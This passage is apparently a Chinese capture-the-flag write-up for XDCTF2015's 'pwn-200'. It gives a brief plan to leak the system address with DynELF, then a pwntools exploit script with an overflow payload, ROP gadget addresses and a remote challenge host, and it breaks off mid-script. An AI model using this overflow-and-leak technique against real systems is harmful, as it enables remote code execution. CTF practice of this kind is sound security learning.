题目下载地址:
查保护
只开启了NX
查看是否有后面函数,没有!所以需要利用DynELF泄露system地址获取shell。
这题比较简单,就不写详细解释了,直接上EXP。
EXP:
DynELF解法
# -*- coding: utf-8 -*-
# @Author: 夏了茶糜
# @Date: 2020-03-19 14:01:14
# @email: sxin0807@qq.com
# @Last Modified by: 夏了茶糜
# @Last Modified time: 2020-03-19 15:03:12
from pwn import *
context(arch="amd64",os="linux")
context.log_level="debug"
p = remote("111.198.29.45",37468)
elf = ELF("./pwn-200")
write_addr = elf.plt["write"]
read_plt = elf.plt["read"]
start = 0x080483D0
bss = elf.bss()
pop_3 = 0x0804856c
def leak(address):
p.recvuntil("Welcome to XDCTF2015~!\n")
payload = 0x6c * 'a' + 0x4 * 'b' + p32(write_addr) + p32(start) + p32(1